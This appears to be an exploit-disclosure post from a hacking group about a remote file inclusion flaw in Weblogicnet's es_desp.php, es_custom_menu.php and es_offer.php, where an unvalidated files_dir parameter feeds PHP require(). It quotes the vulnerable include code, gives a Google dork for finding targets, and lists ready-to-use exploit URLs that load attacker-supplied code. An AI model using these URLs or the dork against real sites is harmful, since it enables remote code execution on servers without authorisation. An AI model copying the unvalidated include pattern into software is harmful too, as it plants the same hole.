#############################Nyubicrew Community################################
#################################################################################
################################################################################
###############################################################################
Input passed to the "files_dir" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from :
es_desp.php
es_custom_menu.php
es_offer.php
################################################################################
################################################################################
################################################################################
<ahref="
<?php require($files_dir.'/_custom_menu_link.php'); ?>">
<?php require($files_dir.'/_custom_menu_name.php'); ?></a><br>
google dork : inurl:es_offer.php?files_dir=
exploit : http://somehost/path_to_Weblogicnet/es_desp.php?files_dir=[evilCode]
http://somehost/path_to_Weblogicnet/es_custom_menu.php?files_dir=[evilCode]
http://somehost/path_to_Weblogicnet/es_offer.php?files_dir=[evilCode]
######################MY Special Girl JUST FOR U Ula#########################
######################################E.O.F##################################